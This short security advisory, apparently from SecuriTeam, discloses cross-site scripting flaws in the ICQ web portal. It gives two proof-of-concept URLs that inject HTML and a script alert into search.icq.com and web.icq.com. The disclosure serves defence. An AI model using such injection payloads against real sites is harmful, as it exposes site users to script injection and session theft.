|
Brought to you by:
Suppliers of:
|
|
|
| |
| The ICQ portal suffers from several Cross Site Scripting vulnerabilities. These vulnerabilities allow attackers to force the web site to return arbitrary information that would seem as coming from the original web site. |
| |
Credit:
For more information about CSS (Cross Site Scripting), see:
http://www.securiteam.com/exploits/5IP000K0LI.html
The information has been provided by Cabezon Aurelien.
|
| |
The ICQ web portal may inadvertently include malicious HTML tags or script in dynamically generated pages.
Example 1:
http://search.icq.com/dirsearch.adp?query=<h1>Hello!</h1><script>alert('hello');</script>est&wh=is&users=1
Screen Shots:
http://www.isecurelabs.com/advisory/icq1.jpg
http://www.isecurelabs.com/advisory/icq2.jpg
Example 2:
http://web.icq.com/foo/<script>alert('hello');</script>
Screen Shots:
http://www.isecurelabs.com/advisory/icq3.jpg
http://www.isecurelabs.com/advisory/icq4.jpg
|
|
|
|
|